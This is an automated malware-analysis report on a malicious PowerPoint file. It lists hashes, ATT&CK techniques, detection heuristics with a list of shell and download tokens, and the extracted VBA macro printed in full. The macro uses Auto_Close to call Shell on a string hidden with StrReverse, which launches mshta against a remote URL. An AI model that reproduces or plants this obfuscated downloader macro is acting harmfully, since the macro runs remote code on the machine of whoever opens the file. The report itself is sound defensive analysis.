Office (OLE) / .PPT malware analysis — malicious · 6395297bafa84cc5

MALICIOUS

Office (OLE) / .PPT

72.5 KB Created: 2006-08-16 00:00:00 Authoring application: Microsoft Office PowerPoint First seen: 2026-05-13

MD5: 75a8c41e60845810c93904f5fa25ff68 SHA-1: 8d1f3c7f893d5e3bb01d319854fcbabe36c3698c SHA-256: 6395297bafa84cc5d476a73fc5a432b62d9a50fa3ba14daf5eb63a91ddd897df

128 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a PowerPoint presentation containing VBA macros. The Auto_Close macro triggers a Shell execution, which attempts to download and execute a payload from the reconstructed URL "http://smth.jp\:ckpadokawad.exe". The target executable path is also obfuscated within the script.

Heuristics 4

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    Call Shell(stAppName, 1)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub Auto_Close()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 510 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	510 bytes
SHA-256: `471cb0416b0d296bda4d0432108f5ef726a483b6eeb57fffdfa39a12c6497894`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Calculator_Click() '%SystemRoot%\system32\calc.exe On Error GoTo Err_Calculator_Click Dim stAppName As String stAppName = StrReverse("""awadadkcpaodckpao\pm.j\\:sptth"""" athsm""") Call Shell(stAppName, 1) Exit_Calculator_Click: Exit Sub Err_Calculator_Click: MsgBox Err.Description Resume Exit_Calculator_Click End Sub Attribute VB_Name = "Module2" Sub Auto_Close() Calculator_Click End Sub

SHA-256: 471cb0416b0d296bda4d0432108f5ef726a483b6eeb57fffdfa39a12c6497894

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub Calculator_Click()

    '%SystemRoot%\system32\calc.exe

    On Error GoTo Err_Calculator_Click

    Dim stAppName As String

    stAppName = StrReverse("""awadadkcpaodckpao\pm.j\\:sptth""""      athsm""")

    Call Shell(stAppName, 1)

Exit_Calculator_Click:

    Exit Sub

Err_Calculator_Click:

    MsgBox Err.Description

    Resume Exit_Calculator_Click

End Sub



Attribute VB_Name = "Module2"
Sub Auto_Close()
Calculator_Click
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.